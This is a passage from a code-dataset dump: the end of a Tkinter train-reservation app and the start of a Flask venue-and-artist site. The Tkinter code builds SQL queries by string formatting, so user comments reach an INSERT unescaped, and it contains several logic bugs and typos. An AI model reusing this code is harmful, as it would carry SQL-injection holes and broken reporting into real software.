self.viewReview2)\n b2.grid(row = 1, column = 1)\n\n def backMain(self):\n self.viewReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"select\",\"train\",\"time\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"select\", text= \"Select\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"time\", text= \"Time (Duration)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def viewReview2(self):\n self.viewReviewWin.withdraw()\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin2)\n frame.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Comment, Rating FROM REVIEW WHERE REVIEW.Train_Number = '%d'\" % (TrainReviewNumber)\n cursor.execute(query)\n results = cursor.fetchall()\n\n tree = self.viewTree(frame)\n\n b1 = Button(frame, text = \"Back to Choose Functionality\", command = self.switchMainMenu)\n b1.pack(side = BOTTOM)\n\n def switchMainMenu(self):\n self.viewReviewWin2.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def giveReview(self):\n self.primaryWindow.destroy()\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n\n frame = Frame(self.giveReviewWin)\n frame.pack()\n\n self.trainNo = IntVar()\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.trainNo, width = 20)\n e1.grid(row = 0, column = 1)\n\n l2 = Label(frame, text = \"Rating\")\n l2.grid(row = 1, column = 0, sticky = W)\n self.rating = StringVar()\n self.cho = [\"Very Good\", \"Good\", \"Neutral\", \"Bad\", \"Very Bad\"]\n\n option = OptionMenu(frame, self.rating, self.cho[0], *self.cho)\n option.grid(row = 1, column = 1)\n\n self.comment = StringVar()\n l3 = Label(frame, text = \"Comment\")\n l3.grid(row = 2, column = 0, sticky = W)\n e3 = Entry(frame, textvariable = self.comment, width = 20)\n e3.grid(row = 2, column = 1)\n\n b1=Button(frame, text =\"Submit\", command = self.verifyRev)\n b1.grid(row = 3, column = 1)\n\n\n def verifyRev(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n if self.trainNo == \"\" or self.rating == \"\":\n messagebox.showerror(\"Error\", \"Train Number and Rating cannot be left blank.\")\n else:\n self.rate = 5\n if self.rating.get() == self.cho[0]:\n self.rate = 5\n elif self.rating.get() == self.cho[1]:\n self.rate = 4\n elif self.rating.get() == self.cho[2]:\n self.rate = 3\n elif self.rating.get() == self.cho[3]:\n self.rate = 2\n elif self.rating.get() == self.cho[4]:\n self.rate = 1\n\n server = self.Connect()\n cursor = server.cursor()\n queryFrom = \"SELECT MAX(Review_Number) FROM REVIEW\"\n cursor.execute(queryFrom)\n result = cursor.fetchall()\n\n query = \"INSERT INTO REVIEW(Review_Number, Comment, Rating, Username, Train_Number) VALUES ('%d', '%s', '%d', '%s', '%d')\" % (result[0][0] + 1, self.comment.get(), self.rate, self.username.get(), self.trainNo.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ################ check to see if the train number is valid###############################\n def mainBack(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n ######elif ##train number isnt correct:\n else:\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ###########write the rating to a DB#################\n\n\n def viewTree2(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"rev\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"rev\", text= \"Revenue\")\n return tree\n\n def viewRevenueRep(self):\n self.primaryWindow.withdraw()\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n\n frame = Frame(self.viewRevenueReport)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n\n if backOne == \"01\":\n backOneShow = \"January\"\n if backOne == \"02\":\n backOneShow = \"February\"\n if backOne == \"03\":\n backOneShow = \"March\"\n if backOne == \"04\":\n backOneShow = \"April\"\n if backOne == \"05\":\n backOneShow = \"May\"\n if backOne == \"06\":\n backOneShow = \"June\"\n if backOne == \"07\":\n backOneShow = \"July\"\n if backOne == \"08\":\n backOneShow = \"August\"\n if backOne == \"09\":\n backOneShow = \"September\"\n if backOne == \"10\":\n backOneShow = \"October\"\n if backOne == \"11\":\n backOneShow = \"November\"\n if backOne == \"12\":\n backOneShow = \"December\"\n\n\n if backTwo == \"01\":\n backTwoShow = \"January\"\n if backTwo == \"02\":\n backTwoShow = \"February\"\n if backTwo == \"03\":\n backTwoShow = \"March\"\n if backTwo == \"04\":\n backTwoShow = \"April\"\n if backTwo == \"05\":\n backTwoShow = \"May\"\n if backTwo == \"06\":\n backTwoShow = \"June\"\n if backTwo == \"07\":\n backTwoShow = \"July\"\n if backTwo == \"08\":\n backTwoShow = \"August\"\n if backTwo == \"09\":\n backTwoShow = \"September\"\n if backTwo == \"10\":\n backTwoShow = \"October\"\n if backTwo == \"11\":\n backTwoShow = \"November\"\n if backTwo == \"12\":\n backTwoShow = \"December\"\n\n if backThree == \"01\":\n backThreeShow = \"January\"\n if backThree == \"02\":\n backThreeShow = \"February\"\n if backThree == \"03\":\n backThreeShow = \"March\"\n if backThree == \"04\":\n backThreeShow = \"April\"\n if backThree == \"05\":\n backThreeShow = \"May\"\n if backThree == \"06\":\n backThreeShow = \"June\"\n if backThree == \"07\":\n backThreeShow = \"July\"\n if backThree == \"08\":\n backThreeShow = \"August\"\n if backThree == \"09\":\n backThreeShow = \"September\"\n if backThree == \"10\":\n backThreeShow = \"October\"\n if backThree == \"11\":\n backThreeShow = \"November\"\n if backThree == \"12\":\n backThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backThree, backTwo)\n query2 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backTwo, backOne)\n query3 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backOne, current)\n cursor.execute(query1)\n result1 = cursor.fetchall()\n cursor.execute(query2)\n result2 = cursor.fetchall()\n cursor.execute(query3)\n result3 = cursor.fetchall()\n\n tree = self.viewTree2(frame)\n tree.insert('', 0, text='', values=(backThreeShow, result1[0][0]))\n tree.insert('', 1, text='', values=(backTwoShow, result2[0][0]))\n tree.insert('', 2, text='', values=(backOneShow, result3[0][0]))\n\n b1 = Button(frame, text = \"Back\", command = self.switchMain)\n b1.pack(side = BOTTOM)\n\n def switchMain(self):\n self.viewRevenueReport.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree3(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"num\",\"rsv\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"num\", text= \"Train number\")\n tree.heading(\"rsv\", text= \"#of Reservations\")\n return tree\n\n def viewpopRR(self):\n #to store in tree somehow\n\n #Month - Route - Reservations\n #backThreeShow results1[0][0] results1[0][1]\n # results1[1][0] results1[1][1]\n # results1[2][0] results1[2][1]\n #backTwoShow results2[0][0] results2[0][1]\n # results2[1][0] results2[1][1]\n # results2[2][0] results2[2][1]\n #backOneShow results3[0][0] results3[0][1]\n # results3[1][0] results3[1][1]\n # results3[2][0] results3[2][1]\n\n self.primaryWindow.withdraw()\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n frame = Frame(self.viewpopRRWin)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n backOneM = backOne[5:7]\n backTwoM = backTwo[5:7]\n backThreeM = backThree[5:7]\n backOneShow = \"\"\n backTwoShow = \"\"\n backThreeShow = \"\"\n\n if backOneM == \"01\":\n backOneShow = \"January\"\n if backOneM == \"02\":\n backOneShow = \"February\"\n if backOneM == \"03\":\n backOneShow = \"March\"\n if backOneM == \"04\":\n backOneShow = \"April\"\n if backOneM == \"05\":\n backOneShow = \"May\"\n if backOneM == \"06\":\n backOneShow = \"June\"\n if backOneM == \"07\":\n backOneShow = \"July\"\n if backOneM == \"08\":\n backOneShow = \"August\"\n if backOneM == \"09\":\n backOneShow = \"September\"\n if backOneM == \"10\":\n backOneShow = \"October\"\n if backOneM == \"11\":\n backOneShow = \"November\"\n if backOneM == \"12\":\n backOneShow = \"December\"\n\n\n if backTwoM == \"01\":\n backTwoShow = \"January\"\n if backTwoM == \"02\":\n backTwoShow = \"February\"\n if backTwoM == \"03\":\n backTwoShow = \"March\"\n if backTwoM == \"04\":\n backTwoShow = \"April\"\n if backTwoM == \"05\":\n backTwoShow = \"May\"\n if backTwoM == \"06\":\n backTwoShow = \"June\"\n if backTwoM == \"07\":\n backTwoShow = \"July\"\n if backTwoM == \"08\":\n backTwoShow = \"August\"\n if backTwoM == \"09\":\n backTwoShow = \"September\"\n if backTwoM == \"10\":\n backTwoShow = \"October\"\n if backTwoM == \"11\":\n backTwoShow = \"November\"\n if backTwoM == \"12\":\n backTwoShow = \"December\"\n\n if backThreeM == \"01\":\n backThreeShow = \"January\"\n if backThreeM == \"02\":\n backThreeShow = \"February\"\n if backThreeM == \"03\":\n backThreeShow = \"March\"\n if backThreeM == \"04\":\n backThreeShow = \"April\"\n if backThreeM == \"05\":\n backThreeShow = \"May\"\n if backThreeM == \"06\":\n backThreeShow = \"June\"\n if backThreeM == \"07\":\n backThreeShow = \"July\"\n if backThreeM == \"08\":\n backThreeShow = \"August\"\n if backThreeM == \"09\":\n backThreeShow = \"September\"\n if backThreeM == \"10\":\n backThreeShow = \"October\"\n if backThreeM == \"11\":\n backThreeShow = \"November\"\n if backThreeM == \"12\":\n bakcThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n queryMonth1 = \"CREATE VIEW Month1 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backThree, backTwo)\n cursor.execute(queryMonth1)\n queryHere1 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month1 GROUP BY TNumber\"\n cursor.execute(queryHere1)\n tempResults1 = cursor.fetchall()\n queryPerTrain1 = \"CREATE TABLE PerTrain1(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain1)\n for result in tempResults1:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain1 = \"INSERT INTO PerTrain1(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain1)\n server.commit()\n queryUltimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryUltimate1)\n preResults11 = cursor.fetchall()\n maxNum11 = 0\n maxTup11 = (0,0)\n for result in preResults11:\n if result[1] > maxNum11:\n maxNum11 = result[1]\n maxTup11 = (result[0], result[1])\n results1 = []\n results1.append(maxTup11)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryPenultimate1)\n preResults12 = cursor.fetchall()\n maxNum12 = 0\n maxTup12 = (0,0)\n for result in preResults12:\n if result[1] > maxNum12:\n maxNum12 = result[1]\n maxTup12 = (result[0], result[1])\n results1.append(maxTup12)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryAntepenultimate1)\n preResults13 = cursor.fetchall()\n maxNum13 = 0\n maxTup13 = (0,0)\n for result in preResults13:\n if result[1] > maxNum13:\n maxNum13 = result[1]\n maxTup13 = (result[0], result[1])\n results1.append(maxTup13)\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n\n queryMonth2 = \"CREATE VIEW Month2 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backTwo, backOne)\n cursor.execute(queryMonth2)\n queryHere2 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month2 GROUP BY TNumber\"\n cursor.execute(queryHere2)\n tempResults2 = cursor.fetchall()\n queryPerTrain2 = \"CREATE TABLE PerTrain2(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain2)\n for result in tempResults2:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain2 = \"INSERT INTO PerTrain2(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain2)\n server.commit()\n queryUltimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryUltimate2)\n preResults21 = cursor.fetchall()\n maxNum21 = 0\n maxTup21 = (0,0)\n for result in preResults21:\n if result[1] > maxNum21:\n maxNum21 = result[1]\n maxTup21 = (result[0], result[1])\n results2 = []\n results2.append(maxTup21)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryPenultimate2)\n preResults22 = cursor.fetchall()\n maxNum22 = 0\n maxTup22 = (0,0)\n for result in preResults22:\n if result[1] > maxNum22:\n maxNum22 = result[1]\n maxTup22 = (result[0], result[1])\n results2.append(maxTup22)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryAntepenultimate2)\n preResults23 = cursor.fetchall()\n maxNum23 = 0\n maxTup23 = (0,0)\n for result in preResults23:\n if result[1] > maxNum13:\n maxNum23 = result[1]\n maxTup23 = (result[0], result[1])\n results2.append(maxTup23)\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n\n queryMonth3 = \"CREATE VIEW Month3 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backOne, current)\n cursor.execute(queryMonth3)\n queryHere3 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month3 GROUP BY TNumber\"\n cursor.execute(queryHere3)\n tempResults3 = cursor.fetchall()\n queryPerTrain3 = \"CREATE TABLE PerTrain3(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain3)\n for result in tempResults3:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain3 = \"INSERT INTO PerTrain3(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain3)\n server.commit()\n queryUltimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryUltimate3)\n preResults31 = cursor.fetchall()\n maxNum31 = 0\n maxTup31 = (0,0)\n for result in preResults31:\n if result[1] > maxNum31:\n maxNum31 = result[1]\n maxTup31 = (result[0], result[1])\n results3 = []\n results3.append(maxTup31)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryPenultimate3)\n preResults32 = cursor.fetchall()\n maxNum32 = 0\n maxTup32 = (0,0)\n for result in preResults32:\n if result[1] > maxNum32:\n maxNum32 = result[1]\n maxTup32 = (result[0], result[1])\n results3.append(maxTup32)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryAntepenultimate3)\n preResults33 = cursor.fetchall()\n maxNum33 = 0\n maxTup33 = (0,0)\n for result in preResults33:\n if result[1] > maxNum13:\n maxNum33 = result[1]\n maxTup33 = (result[0], result[1])\n results3.append(maxTup33)\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n\n queryDrop11 = \"DROP VIEW Month1\"\n queryDrop12 = \"DROP TABLE PerTrain1\"\n queryDrop21 = \"DROP VIEW Month2\"\n queryDrop22 = \"DROP TABLE PerTrain2\"\n queryDrop31 = \"DROP VIEW Month3\"\n queryDrop32 = \"DROP TABLE PerTrain3\"\n cursor.execute(queryDrop11)\n cursor.execute(queryDrop12)\n cursor.execute(queryDrop21)\n cursor.execute(queryDrop22)\n cursor.execute(queryDrop31)\n cursor.execute(queryDrop32)\n server.commit()\n cursor.close()\n server.close()\n\n tree = self.viewTree3(frame)\n tree.insert('', 0, text='', values=(backThreeShow, results1[0][0], results1[0][1]))\n tree.insert('', 1, text='', values=(backThreeShow, results1[1][0], results1[1][1]))\n tree.insert('', 2, text='', values=(backThreeShow, results1[2][0], results1[2][1]))\n tree.insert('', 3, text='', values=(backTwoShow, results2[0][0], results2[0][1]))\n tree.insert('', 4, text='', values=(backTwoShow, results2[1][0], results2[1][1]))\n tree.insert('', 5, text='', values=(backTwoShow, results2[2][0], results2[2][1]))\n tree.insert('', 6, text='', values=(backOneShow, results3[0][0], results3[0][1]))\n tree.insert('', 7, text='', values=(backOneShow, results3[1][0], results3[1][1]))\n tree.insert('', 8, text='', values=(backOneShow, results3[2][0], results3[2][1]))\n\n\n def swtMain(self):\n self.viewpopRRWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\nmw = Tk()\napp = Phase_three(mw)\nmw.mainloop()\n","repo_name":"achiang31/Train_4400","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":73124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39782305374","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n# TODO: connect to a local postgresql database\n# --> Done. Please check details in config.py\n\nfrom flask_migrate import Migrate\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n __tablename__ = 'venues'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: genres, website_link, seeking_talent, seeking_description, and relations: shows\n genres = db.Column(db.String(120))\n website_link = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='venue', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\nclass Artist(db.Model):\n __tablename__ = 'artists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: website_link, seeking_venue, seeking_description, and relations: shows\n website_link = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='artist', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n# done. Check details in each model class\n\n\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = db.Column(db.Integer, primary_key=True)\n artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'), nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey('venues.id'), nullable=False)\n start_time = db.Column(db.DateTime, default=datetime.now(), nullable=False)\n\n def __repr__(self):\n return \"\" %(self.id, self.artist_id, self.venue_id, self.start_time)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\nfrom babel.dates import format_datetime\n\ndef format_datetime(value, format='medium'):\n # instead of just date = dateutil.parser.parse(value)\n # added if/else to handeled a datetime input\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # TODO: replace with real venues data.\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n # find all city/state\n cityState = db.session.query(Venue.city, Venue.state).distinct(Venue.city, Venue.state)\n ans = [] \n for cs in cityState:\n venue_info = Venue.query.filter_by(state = cs.state).filter_by(city = cs.city).all()\n venue_detail = []\n for ven in venue_info:\n venue_detail.append({'id': ven.id, \n 'name': ven.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == ven.id).all() )})\n ans.append( {'city': cs.city, 'state': cs.state, 'venues': venue_detail} ) \n \n return render_template('pages/venues.html', areas=ans);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for Hop should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n response = {}\n search_term = request.form.get('search_term', '')\n venues = Venue.query.filter(Venue.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for venue in venues:\n data.append( {\"id\": venue.id, \n 'name': venue.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == venue.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_venues.html', results=response, search_term=search_term)\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n # done.\n venue = Venue.query.get(venue_id)\n genres = venue.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": venue.id,\n \"name\": venue.name,\n \"genres\": genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website_link,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.venue_id == venue_id).all()\n for show in past_shows_db:\n artist = Artist.query.get(show.artist_id)\n past_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.venue_id == venue_id).all()\n for show in future_shows_db:\n artist = Artist.query.get(show.artist_id)\n future_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n # done.\n try: \n venue = Venue(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n address = request.form['address'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_talent = request.form.get('seeking_talent') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(venue)\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n # done.\n try:\n Venue.query.filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n db.session.close()\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n # please check show_venue.html for details\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n # TODO: replace with real data returned from querying the database\n # done.\n data = Artist.query.all()\n artists = []\n for art in data:\n artists.append( {'id': art.id, 'name': art.name} )\n return render_template('pages/artists.html', artists=artists)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n # search for \"band\" should return \"The Wild Sax Band\".\n # done.\n response = {}\n search_term = request.form.get('search_term', '')\n artists = Artist.query.filter(Artist.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for artist in artists:\n data.append( {\"id\": artist.id, \n 'name': artist.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.artist_id == artist.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_artists.html', results=response, search_term=search_term)\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n # shows the artist page with the given artist_id\n # TODO: replace with real artist data from the artist table, using artist_id\n # done.\n data = {} \n artist = Artist.query.get(artist_id)\n genres = artist.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": artist.id,\n \"name\": artist.name,\n \"genres\": genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website_link,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n \n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.artist_id == artist_id).all()\n for show in 